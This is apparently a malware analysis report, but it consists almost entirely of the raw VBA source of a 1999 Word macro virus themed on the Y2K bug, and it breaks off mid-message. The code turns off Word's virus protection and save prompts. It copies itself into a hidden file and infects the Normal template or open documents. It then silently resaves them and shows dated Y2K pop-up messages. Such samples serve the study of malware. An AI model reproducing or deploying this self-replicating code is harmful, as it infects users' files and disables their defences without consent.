Malicious Office (OLE) — malware analysis report

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
'y2k
' Open Letter to the Virus Hunters
'
' This virus was written to help educate the
' public about the dangers of the approaching
' millennium bug. Please do not update your
' virus scanners to detect or clean this virus
' until after December 1, 1999.
'
' I know you won't do that, but what the heck.
'
' I tried.
'
' Bye!
'
On Error Resume Next

s = ActiveDocument.Saved

Application.EnableCancelKey = Not -1

With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With

Randomize

If Dir("c:\sys00.bak", 6) = "" Then
   Open "c:\sys00.bak" For Output As #1
   For i = 1 To MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
      a = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(i, 1)
      Print #1, a
      Next i
   Close #1
   SetAttr "c:\sys00.bak", 6
End If

If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'y2k" Then
   Set tf = NormalTemplate.VBProject.VBComponents.Item(1)
ElseIf ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'y2k" Then
   Set tf = ActiveDocument.VBProject.VBComponents.Item(1)
Else
   tf = ""
End If

If tf <> "" Then
   Open "c:\sys00.bak" For Input As #1
   If LOF(1) = 0 Then GoTo q
   i = 1
   Do While Not EOF(1)
      Line Input #1, a
      tf.CodeModule.InsertLines i, a
      i = i + 1
   Loop
q:
   Close #1
   ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
   If ActiveDocument.Saved <> s Then ActiveDocument.Saved = s
End If

dd = Day(Now): mm = Month(Now): yy = Year(Now)
hh = Hour(Now): mm = Minute(Now): ss = Second(Now)

' only display messages for 1999
If yy <> 1999 Then
   GoTo end_here
End If

' only display messages until after lunch
If hh > 12 Then
   GoTo end_here
End If

t$ = Chr(13) + Chr(13)

'april 1, 1999
If dd = 1 And mm = 4 Then
   Title$ = "Y2K! Spread the word"
   msg$ = "This is not an April fools joke. I wish it were! The year 2000 is fast approaching, and the word still needs to be spread about the implications and dangers of the millennium bug commonly referred to as the Y2K bug. The virus that has infected this word document was written to help spread the word about the Y2K bug, and educate you so you can prepare yourself and your family for Saturday January 1, 2000."
   msg$ = msg$ + t$ + "From today until January 1, 2000, on the first business day of each month, I will give you a lesson in Y2K preparation."
   msg$ = msg$ + t$ + "Spread the word. Knowledge is power!"
   MsgBox msg$, vbCritical, Title$
End If

'May 3, 1999
If dd = 3 And mm = 5 Then
   Title$ = "Hello again!"
   msg$ = "Lets start our first lesson to help prepare you for the millennium bug. Although I don't personally believe there will be food shortages, power shortages, gas shortages as a result of a computer bug, there will be food, power and gas shortages by hoarding nitwits that fear the millennium bug. As a result, I highly recommend that you begin to stockpile bottled water (1-month supply), canned food (1-month supply), and as much gas as you can store (keep your vehicle gas tank always topped up starting December 1st)."
   msg$ = msg$ + t$ + "That's it for this month. See you next month!"
   MsgBox msg$, vbCritical, Title$
End If

'June 1, 1999
If dd = 1 And mm = 6 Then
   Title$ = "How's the weather?"
   msg$ = "Right now it's pretty warm out, so you are probably not thinking much about the winter. But remember the millennium bug is expected to hit in the middle of winter. If you're in a northern climate, like the Great White North (Canada), I suggest you consider purchasing a good airtight wood stove, and at least a face cord of wood. Even if there are no disruptions in natural gas, or oil, or electricity,
... (truncated)